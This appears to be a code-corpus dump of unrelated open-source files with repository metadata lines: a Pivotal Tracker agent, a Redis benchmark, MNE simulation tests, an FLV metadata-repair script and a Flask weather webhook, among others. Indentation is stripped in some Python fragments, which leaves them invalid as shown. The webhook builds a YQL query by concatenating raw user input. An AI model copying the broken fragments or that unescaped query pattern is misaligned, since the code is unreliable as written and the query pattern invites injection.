self.updateTrackingJson(self.tracking)
def getIterationData(self):
self.storyInBacklog = {}
for project in self.all_projects:
projectId = str(project.get('projectId'))
backlogData = self.getResponse(self.baseEndPoint + "/services/v5/projects/" + projectId +
'/iterations?scope=backlog',
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
if len(backlogData) > 0 and len(backlogData[0]['stories']) > 0:
stories = []
for story in backlogData[0]['stories']:
stories.append(story.get('id'))
self.storyInBacklog[projectId] = stories
lastIteration = self.tracking.get('trackingInfo', {}).get(projectId, {}).get('iteration', 0)
iterationContinue = True
self.iteration_data = []
while iterationContinue:
iterations = self.getResponse(self.baseEndPoint + '/services/v5/projects/' + \
(projectId) + '/iterations?limit=20'+'&offset='+str(lastIteration) + \
'&fields=number%2C' \
'project_id%2Clength%2Cteam_strength%2Cstories%2C' \
'start%2Cfinish%2Ckind%2Cvelocity%2Canalytics',
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
lastIteration = lastIteration + 20
for iteration in iterations:
current_iteration_number = iteration.get('number', '') or 0
if 'stories' in iteration:
for story in iteration.get('stories', []):
injectDataIteration = {}
injectDataIteration['key'] = story.get('id', '')
                            if story.get('id') in self.storyInBacklog.get(projectId, []):
injectDataIteration['backLog'] = True
self.iteration_data += self.parseResponse(self.iterationResponseTemplate, iteration, injectDataIteration)
if len(iterations) !=0:
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
trackingDetails['iteration'] = current_iteration_number
self.tracking['trackingInfo'][projectId] = trackingDetails
else :
iterationContinue = False
iterationinsighstTimeX = self.config.get('dynamicTemplate', {}).get('iteration',{}).get('insightsTimeXFieldMapping',None)
timestamp = iterationinsighstTimeX.get('timefield',None)
timeformat = iterationinsighstTimeX.get('timeformat',None)
isEpoch = iterationinsighstTimeX.get('isEpoch',False)
self.publishToolsData(self.iteration_data,self.relationMetadata,timestamp,timeformat,isEpoch,True)
self.updateTrackingJson(self.tracking)
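    # The tracking JSON maintained by these methods has roughly this shape:
    # {"trackingInfo": {"<projectId>": {"lastUpdatedDate": "...",
    #                                   "lastActivityDate": "...",
    #                                   "iteration": <last offset>}},
    #  "toolInfo": "<timestamp> - login status"}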
def getProjectList(self):
trackingDetails = self.tracking
trackingData = {}
allWorkspaces = self.getResponse(self.baseEndPoint + "/services/v5/my/workspaces" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for workspace in allWorkspaces:
for project_id in workspace.get('project_ids', []):
tempDict = {}
tempDict['workspaceName'] = workspace.get('name')
tempDict['projectId'] = project_id
self.all_projects.append(tempDict)
if project_id:
trackingData[project_id] = {}
all_projects = self.getResponse(self.baseEndPoint + "/services/v5/projects" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for project in all_projects:
tempDict = {}
tempDict['workspaceName'] = None
tempDict['projectId'] = project.get('id', None)
project_id = tempDict['projectId']
tempDict['projectName'] = project.get('name', None)
if project_id:
if not trackingDetails.get('trackingInfo',None):
trackingData[str(project_id)] = {}
trackingDetails['trackingInfo'] = trackingData
self.updateTrackingJson(trackingDetails)
self.all_projects.append(tempDict)
def setUpVariables(self):
self.userid = self.config.get('userid', '')
self.password = self.config.get('passwd', '')
accessToken = self.config.get('token')
self.baseEndPoint = self.config.get('baseEndPoint', '')
self.reqHeaders = {'x-trackertoken': accessToken}
self.timeStampFormat = self.config.get('timeStampFormat')
startFrom = self.config.get("startFrom", '')
startFrom = parser.parse(startFrom)
self.startFrom = startFrom.strftime(self.timeStampFormat)
self.all_projects = []
self.iterationResponseTemplate = self.config.get('dynamicTemplate', {}).get('iterationResponseTemplate', {})
self.relationMetadata = self.config.get('dynamicTemplate', {}).get('relationMetadata', None)
self.storyMetadata = self.config.get('dynamicTemplate', {}).get('storyMetadata', None)
self.storyResponseTemplate = self.config.get('dynamicTemplate', {}).get('responseTemplate', None)
self.activityResponseTemplate = self.config.get('dynamicTemplate', {}).get('activityResponseTemplate', None)
#self.activityRelationMetadata = self.config.get('dynamicTemplate', {}).get('activityRelationMetadata', None)
self.activityMetadata = self.config.get('dynamicTemplate', {}).get('activityResponseTemplate', {}).get('ActivityMetadata', None)
def login(self):
userid = self.getCredential("userid")
password = self.getCredential("passwd")
accessToken = self.getCredential("accesstoken")
baseEndPoint = self.config.get('baseEndPoint', '')
reqHeaders = {'x-trackertoken': accessToken}
trackingDetails = self.tracking
loginResponse = self.getResponse(baseEndPoint + "/services/v5/me" ,
'GET', userid, password, None, reqHeaders=reqHeaders)
if loginResponse:
currentState = str(time.time()) + " - Logged in successfully"
else:
currentState = str(time.time()) + " - Unable to login using config credentials."
trackingDetails["toolInfo"] = currentState
self.updateTrackingJson(trackingDetails)
if __name__ == "__main__":
PivotalTrackerAgent()
| apache-2.0 | 4,832,219,274,571,249,000 | 58.055944 | 139 | 0.562937 | false |
lzhjie/benchmark | client_redis.py | 1 | 1166 | # coding: utf-8
# Copyright (C) zhongjie luo <[email protected]>
import redis
from db_bench import DbConnection, multi_process_bench, Options
class StrictRedis(DbConnection):
def __init__(self, options):
super(StrictRedis, self).__init__(options)
self.__db = 0
self.__client = None
def connect(self):
self.__client = redis.StrictRedis(self.host, self.port, self.__db)
def disconnect(self):
self.__client = None
def insert(self, record):
k, v = record[0]
        return self.__client.set(str(k), str(v), nx=True) is True
def search(self, record):
k, v = record[0]
return self.__client.get(str(k)) == str(v)
def delete(self, record):
k, v = record[0]
        return self.__client.delete(str(k)) > 0  # delete() returns the removed-key count
def tear_down(self):
self.__client.flushdb()
def api_example():
pass
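    # Minimal sketch (assumption: a local Redis on 127.0.0.1:6379) of the raw
    # redis-py calls that the StrictRedis wrapper above issues.
    client = redis.StrictRedis('127.0.0.1', 6379, 0)
    client.set('key', 'value', nx=True)   # insert; returns None if key exists
    assert client.get('key') == b'value'  # search (redis-py returns bytes)
    client.delete('key')                  # delete; returns number of removed keys
    client.flushdb()                      # tear_down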
if __name__ == "__main__":
option = Options()
option.set("port", 6379)
if option.parse_option() is False:
exit(100)
print(option)
result = multi_process_bench(option, StrictRedis)
# print result
| mit | 9,135,346,619,652,901,000 | 22.808511 | 74 | 0.56518 | false |
bparzella/secsgem | secsgem/secs/data_items/objid.py | 1 | 1674 | #####################################################################
# objid.py
#
# (c) Copyright 2021, Benjamin Parzella. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#####################################################################
"""OBJID data item."""
from .. import variables
from .base import DataItemBase
class OBJID(DataItemBase):
"""
Object identifier.
:Types:
- :class:`String <secsgem.secs.variables.String>`
- :class:`U8 <secsgem.secs.variables.U8>`
- :class:`U1 <secsgem.secs.variables.U1>`
- :class:`U2 <secsgem.secs.variables.U2>`
- :class:`U4 <secsgem.secs.variables.U4>`
**Used In Function**
- :class:`SecsS01F19 <secsgem.secs.functions.SecsS01F19>`
- :class:`SecsS14F01 <secsgem.secs.functions.SecsS14F01>`
- :class:`SecsS14F02 <secsgem.secs.functions.SecsS14F02>`
- :class:`SecsS14F03 <secsgem.secs.functions.SecsS14F03>`
- :class:`SecsS14F04 <secsgem.secs.functions.SecsS14F04>`
"""
__type__ = variables.Dynamic
__allowedtypes__ = [
variables.U1,
variables.U2,
variables.U4,
variables.U8,
variables.String
]
| lgpl-2.1 | -4,627,299,520,120,166,000 | 33.875 | 69 | 0.61828 | false |
jaeilepp/mne-python | mne/simulation/tests/test_raw.py | 1 | 13124 | # Authors: Mark Wronkiewicz <[email protected]>
# Yousra Bekhti <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
from copy import deepcopy
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
from nose.tools import assert_true, assert_raises, assert_equal
from mne import (read_source_spaces, pick_types, read_trans, read_cov,
make_sphere_model, create_info, setup_volume_source_space,
find_events, Epochs, fit_dipole, transform_surface_to,
make_ad_hoc_cov, SourceEstimate, setup_source_space)
from mne.chpi import _calculate_chpi_positions, read_head_pos, _get_hpi_info
from mne.tests.test_chpi import _assert_quats
from mne.datasets import testing
from mne.simulation import simulate_sparse_stc, simulate_raw
from mne.io import read_raw_fif, RawArray
from mne.time_frequency import psd_welch
from mne.utils import _TempDir, run_tests_if_main, slow_test
warnings.simplefilter('always')
data_path = testing.data_path(download=False)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif')
cov_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-cov.fif')
trans_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = op.join(data_path, 'subjects')
bem_path = op.join(subjects_dir, 'sample', 'bem')
src_fname = op.join(bem_path, 'sample-oct-2-src.fif')
bem_fname = op.join(bem_path, 'sample-320-320-320-bem-sol.fif')
raw_chpi_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw_subsampled.pos')
def _make_stc(raw, src):
"""Helper to make a STC."""
seed = 42
sfreq = raw.info['sfreq'] # Hz
tstep = 1. / sfreq
n_samples = len(raw.times) // 10
times = np.arange(0, n_samples) * tstep
stc = simulate_sparse_stc(src, 10, times, random_state=seed)
return stc
def _get_data():
"""Helper to get some starting data."""
# raw with ECG channel
raw = read_raw_fif(raw_fname).crop(0., 5.0).load_data()
data_picks = pick_types(raw.info, meg=True, eeg=True)
other_picks = pick_types(raw.info, meg=False, stim=True, eog=True)
picks = np.sort(np.concatenate((data_picks[::16], other_picks)))
raw = raw.pick_channels([raw.ch_names[p] for p in picks])
raw.info.normalize_proj()
ecg = RawArray(np.zeros((1, len(raw.times))),
create_info(['ECG 063'], raw.info['sfreq'], 'ecg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass', 'dig'):
ecg.info[key] = raw.info[key]
raw.add_channels([ecg])
src = read_source_spaces(src_fname)
trans = read_trans(trans_fname)
sphere = make_sphere_model('auto', 'auto', raw.info)
stc = _make_stc(raw, src)
return raw, src, stc, trans, sphere
@testing.requires_testing_data
def test_simulate_raw_sphere():
"""Test simulation of raw data with sphere model."""
seed = 42
raw, src, stc, trans, sphere = _get_data()
assert_true(len(pick_types(raw.info, meg=False, ecg=True)) == 1)
# head pos
head_pos_sim = dict()
# these will be at 1., 2., ... sec
shifts = [[0.001, 0., -0.001], [-0.001, 0.001, 0.]]
for time_key, shift in enumerate(shifts):
# Create 4x4 matrix transform and normalize
temp_trans = deepcopy(raw.info['dev_head_t'])
temp_trans['trans'][:3, 3] += shift
head_pos_sim[time_key + 1.] = temp_trans['trans']
#
# Test raw simulation with basic parameters
#
raw_sim = simulate_raw(raw, stc, trans, src, sphere, read_cov(cov_fname),
head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
raw_sim_2 = simulate_raw(raw, stc, trans_fname, src_fname, sphere,
cov_fname, head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
assert_array_equal(raw_sim_2[:][0], raw_sim[:][0])
# Test IO on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'sim_test_raw.fif')
raw_sim.save(test_outname)
raw_sim_loaded = read_raw_fif(test_outname, preload=True)
assert_allclose(raw_sim_loaded[:][0], raw_sim[:][0], rtol=1e-6, atol=1e-20)
del raw_sim, raw_sim_2
# with no cov (no noise) but with artifacts, most time periods should match
# but the EOG/ECG channels should not
for ecg, eog in ((True, False), (False, True), (True, True)):
raw_sim_3 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=eog, ecg=ecg, random_state=seed)
raw_sim_4 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=False, ecg=False, random_state=seed)
picks = np.arange(len(raw.ch_names))
diff_picks = pick_types(raw.info, meg=False, ecg=ecg, eog=eog)
these_picks = np.setdiff1d(picks, diff_picks)
close = np.isclose(raw_sim_3[these_picks][0],
raw_sim_4[these_picks][0], atol=1e-20)
assert_true(np.mean(close) > 0.7)
far = ~np.isclose(raw_sim_3[diff_picks][0],
raw_sim_4[diff_picks][0], atol=1e-20)
assert_true(np.mean(far) > 0.99)
del raw_sim_3, raw_sim_4
# make sure it works with EEG-only and MEG-only
raw_sim_meg = simulate_raw(raw.copy().pick_types(meg=True, eeg=False),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_eeg = simulate_raw(raw.copy().pick_types(meg=False, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_meeg = simulate_raw(raw.copy().pick_types(meg=True, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
assert_allclose(np.concatenate((raw_sim_meg[:][0], raw_sim_eeg[:][0])),
raw_sim_meeg[:][0], rtol=1e-7, atol=1e-20)
del raw_sim_meg, raw_sim_eeg, raw_sim_meeg
# check that different interpolations are similar given small movements
raw_sim = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='linear')
raw_sim_hann = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='hann')
assert_allclose(raw_sim[:][0], raw_sim_hann[:][0], rtol=1e-1, atol=1e-14)
del raw_sim, raw_sim_hann
# Make impossible transform (translate up into helmet) and ensure failure
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[1.][2, 3] -= 0.1 # z trans upward 10cm
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
ecg=False, blink=False, head_pos=head_pos_sim_err)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src,
bem_fname, ecg=False, blink=False,
head_pos=head_pos_sim_err)
# other degenerate conditions
assert_raises(TypeError, simulate_raw, 'foo', stc, trans, src, sphere)
assert_raises(TypeError, simulate_raw, raw, 'foo', trans, src, sphere)
assert_raises(ValueError, simulate_raw, raw, stc.copy().crop(0, 0),
trans, src, sphere)
stc_bad = stc.copy()
stc_bad.tstep += 0.1
assert_raises(ValueError, simulate_raw, raw, stc_bad, trans, src, sphere)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
chpi=True) # no cHPI info
assert_raises(ValueError, simulate_raw, raw, stc, trans, src, sphere,
interp='foo')
assert_raises(TypeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=1.)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=pos_fname) # ends up with t>t_end
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[-1.] = head_pos_sim_err[1.] # negative time
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=head_pos_sim_err)
raw_bad = raw.copy()
raw_bad.info['dig'] = None
assert_raises(RuntimeError, simulate_raw, raw_bad, stc, trans, src, sphere,
blink=True)
@slow_test
@testing.requires_testing_data
def test_simulate_raw_bem():
"""Test simulation of raw data with BEM."""
raw, src, stc, trans, sphere = _get_data()
src = setup_source_space('sample', 'oct1', subjects_dir=subjects_dir)
for s in src:
s['nuse'] = 3
s['vertno'] = src[1]['vertno'][:3]
s['inuse'].fill(0)
s['inuse'][s['vertno']] = 1
# use different / more complete STC here
vertices = [s['vertno'] for s in src]
stc = SourceEstimate(np.eye(sum(len(v) for v in vertices)), vertices,
0, 1. / raw.info['sfreq'])
raw_sim_sph = simulate_raw(raw, stc, trans, src, sphere, cov=None)
raw_sim_bem = simulate_raw(raw, stc, trans, src, bem_fname, cov=None,
n_jobs=2)
# some components (especially radial) might not match that well,
# so just make sure that most components have high correlation
assert_array_equal(raw_sim_sph.ch_names, raw_sim_bem.ch_names)
picks = pick_types(raw.info, meg=True, eeg=True)
n_ch = len(picks)
corr = np.corrcoef(raw_sim_sph[picks][0], raw_sim_bem[picks][0])
assert_array_equal(corr.shape, (2 * n_ch, 2 * n_ch))
med_corr = np.median(np.diag(corr[:n_ch, -n_ch:]))
assert_true(med_corr > 0.65, msg=med_corr)
# do some round-trip localization
for s in src:
transform_surface_to(s, 'head', trans)
locs = np.concatenate([s['rr'][s['vertno']] for s in src])
tmax = (len(locs) - 1) / raw.info['sfreq']
cov = make_ad_hoc_cov(raw.info)
# The tolerance for the BEM is surprisingly high (28) but I get the same
# result when using MNE-C and Xfit, even when using a proper 5120 BEM :(
for use_raw, bem, tol in ((raw_sim_sph, sphere, 1),
(raw_sim_bem, bem_fname, 31)):
events = find_events(use_raw, 'STI 014')
assert_equal(len(locs), 6)
evoked = Epochs(use_raw, events, 1, 0, tmax, baseline=None).average()
assert_equal(len(evoked.times), len(locs))
fits = fit_dipole(evoked, cov, bem, trans, min_dist=1.)[0].pos
diffs = np.sqrt(np.sum((locs - fits) ** 2, axis=-1)) * 1000
med_diff = np.median(diffs)
assert_true(med_diff < tol, msg='%s: %s' % (bem, med_diff))
@slow_test
@testing.requires_testing_data
def test_simulate_raw_chpi():
"""Test simulation of raw data with cHPI."""
raw = read_raw_fif(raw_chpi_fname, allow_maxshield='yes')
picks = np.arange(len(raw.ch_names))
picks = np.setdiff1d(picks, pick_types(raw.info, meg=True, eeg=True)[::4])
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
sphere = make_sphere_model('auto', 'auto', raw.info)
# make sparse spherical source space
sphere_vol = tuple(sphere['r0'] * 1000.) + (sphere.radius * 1000.,)
src = setup_volume_source_space('sample', sphere=sphere_vol, pos=70.)
stc = _make_stc(raw, src)
# simulate data with cHPI on
raw_sim = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=False,
interp='zero')
# need to trim extra samples off this one
raw_chpi = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=True,
head_pos=pos_fname, interp='zero')
# test cHPI indication
hpi_freqs, hpi_pick, hpi_ons = _get_hpi_info(raw.info)
assert_allclose(raw_sim[hpi_pick][0], 0.)
assert_allclose(raw_chpi[hpi_pick][0], hpi_ons.sum())
# test that the cHPI signals make some reasonable values
picks_meg = pick_types(raw.info, meg=True, eeg=False)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
for picks in [picks_meg[:3], picks_eeg[:3]]:
psd_sim, freqs_sim = psd_welch(raw_sim, picks=picks)
psd_chpi, freqs_chpi = psd_welch(raw_chpi, picks=picks)
assert_array_equal(freqs_sim, freqs_chpi)
freq_idx = np.sort([np.argmin(np.abs(freqs_sim - f))
for f in hpi_freqs])
if picks is picks_meg:
assert_true((psd_chpi[:, freq_idx] >
100 * psd_sim[:, freq_idx]).all())
else:
assert_allclose(psd_sim, psd_chpi, atol=1e-20)
# test localization based on cHPI information
quats_sim = _calculate_chpi_positions(raw_chpi, t_step_min=10.)
quats = read_head_pos(pos_fname)
_assert_quats(quats, quats_sim, dist_tol=5e-3, angle_tol=3.5)
run_tests_if_main()
| bsd-3-clause | -239,478,660,592,898,980 | 45.211268 | 79 | 0.604846 | false |
CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/cache/utils.py | 1 | 2304 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Helper functions for cache package."""
try:
import hashlib
sha_hash = hashlib.sha1
except ImportError:
import sha
sha_hash = sha.new
##############################################################################
def hash_list(lst, hasher_f, constant_hasher_map={}):
hasher = sha_hash()
hash_l = [hasher_f(el, constant_hasher_map) for el in lst]
hash_l.sort()
for hel in hash_l: hasher.update(hel)
return hasher.digest()
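# Note: hash_list is deliberately order-insensitive -- the per-element digests
# are sorted before being folded into the outer SHA hash, so two lists that
# differ only in ordering produce the same digest.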
| bsd-3-clause | 1,477,760,557,045,283,600 | 45.08 | 79 | 0.659722 | false |
a67878813/script | flvrepair.py | 1 | 3480 | # coding: utf-8
#2019.11.24 refixed in ubuntu19.10
#yamdi must be installed before use
#sudo apt install yamdi
#ubuntu 16.04LTS
#Example mount command for sharing with a Windows machine:
#sudo mount -t cifs -o username="<username>",password="<password>",uid=1000 //192.168.2.90/raid5_5-9/直播录像 /mnt2
#If the mount point does not exist, run in a terminal:
#sudo mkdir mnt2
#sudo chown -R <linux-user>:<linux-user> mnt2
#Usage:
#1. Edit the directory tree this script walks for flv files (the contents variable), then
#2. cd into the script's directory in a terminal and run:
#python3 flvrepair.py
import os
import os.path
import json
import random
import pickle
import time
from termcolor import colored
#subprocess-related modules
import subprocess
#contents is the directory tree to walk for flv files
contents = "/mnt"
#******************************
error_counts = 0
s =[]
for root, dirs, files in os.walk(contents):
for name in files:
s.append(os.path.join(root, name))
#可注释掉
#print(s)
end_list = []
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except FileNotFoundError:
print("donelist is not exist")
done_list = []
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
for line in s:
    #flv files that have not been fixed yet are appended to end_list
if (".flv" in line) and (line not in done_list):
end_list.append(line)
print_list=end_list[:3]
for i in print_list:
print(i)
print(colored((" 未添加meta数据的flv文件数 = " + str(len(end_list))),"cyan"))
#check whether the temporary directory exists
if os.path.isdir(contents+"/_temp"):
pass
else:
os.mkdir(contents+"/_temp")
print("临时目录已建立")
#
#os.remove(contents+"/_temp")
for line in end_list:
#
try:
ctime = os.path.getctime(line)
except :
error_counts +=1
continue
#
salt_ = random.randint(110, 880)
print(colored("进行meta注入 = "+str(line),"green"))
try:
child = subprocess.Popen(["/usr/bin/yamdi","-i",line,"-o",contents+"/_temp/output.tmp"],stderr=subprocess.STDOUT)
child.wait()
except:
error_counts +=1
print(colored("meta信息写入错误","red"))
print(colored(line,"red"))
print(child.stderr)
continue
time.sleep(10)
try:
child2 = subprocess.Popen(["mv","-f",contents+"/_temp/output.tmp",line],stderr=subprocess.STDOUT)
        child2.wait() # wait for the child process to finish before the parent continues
except :
error_counts +=1
print(colored("mv错误","red"))
print(colored(line,"red"))
continue
time.sleep(10)
#
try:
os.utime(line, (ctime,ctime))
except :
error_counts +=1
continue
print(colored("meta注入完成 = "+str(line),"green"))
print(colored("next","green"))
    #update the done list
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except:
continue
done_list.append(line)
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
try:
with open(contents+'/done_list.pik', 'wb') as f:
pickle.dump(done_list,f)
except:
continue
print(colored(("Error_Counts =" + str(error_counts)),"red"))
if error_counts == 0 :
print(colored("全部完成","green"))
else:
print(colored("全部完成 with error = "+str(error_counts),"red"))
| apache-2.0 | -2,722,938,224,545,431,000 | 20.682759 | 121 | 0.594148 | false |
jzawar/highstreet | app.py | 1 | 5268 | #!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def suggestDeodrant(condition, person, city):
print(person)
url = 'http://ipinfo.io/json'
res = urlopen(url)
dt = json.load(res)
    IP = dt['ip']
    org = dt['org']
    currCity = dt['city']
    country = dt['country']
    region = dt['region']
humidWeatherList = ['Cloudy','mostly cloudy (night)','mostly cloudy (day)','partly cloudy (night)','partlycloudy (day)','tornado','tropical storm','hurricane','severe thunderstorms','thunderstorms','mixed rain and snow','mixed rain and sleet','mixed snow and sleet','freezing drizzle','drizzle','freezing rain','Showers','snow flurries','light snow showers','blowing snow','snow','hail','sleet','mixed rain and hail','thundershowers','snow showers','isolated','thundershowers'];
hotWeatherList = ['dust','foggy','haze','smoky','blustery','windy','cold','clear (night)','sunny','fair (night)','fair (day)','hot','isolated thunderstorms','scattered thunderstorms','scattered thunderstorms','scattered showers','heavy snow','scattered snow showers','heavy snow','partly cloudy'];
if(condition in humidWeatherList):
if person == 'Men':
            condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Moist/c/580">Anti-Perspirant Deodorants</a> for ' + person
else:
            condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Moist/c/395">Anti-Perspirant Deodorants</a> for ' + person
else:
if person == 'Men':
            condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Dry/c/570">Perfumed Deodorants</a> for ' + person
else:
            condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Dry/c/390">Perfumed Deodorants</a> for ' + person
if currCity != city:
        condition = condition+' I see you are currently in '+currCity+'. Are you flying to '+city+'?'
return condition
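# Illustrative usage (hypothetical values, shown only as a sketch):
#   suggestDeodorant('drizzle', 'Men', 'Mumbai')
# returns a suggestion string such as:
#   "Hmmm.. The weather in Mumbai looks drizzle. I suggest these
#    <a href=...>Anti-Perspirant Deodorants</a> for Men"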
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data,req)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data, req):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
#speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = "Hmmm.. It looks " + condition.get('text') + " in " + location.get('city')
airesult = req.get("result")
parameters = airesult.get("parameters")
person = parameters.get('Person')
city = parameters.get("geo-city")
    returnedSpeech = suggestDeodorant(condition.get('text'), person, city)
print(returnedSpeech)
#print("Response:")
#print(speech)
return {
"speech": returnedSpeech,
"displayText": returnedSpeech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 1,609,381,478,073,361,700 | 35.583333 | 482 | 0.656986 | false |
rcosnita/fantastico | fantastico/routing_engine/__init__.py | 1 | 1176 | '''
Copyright 2013 Cosnita Radu Viorel
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
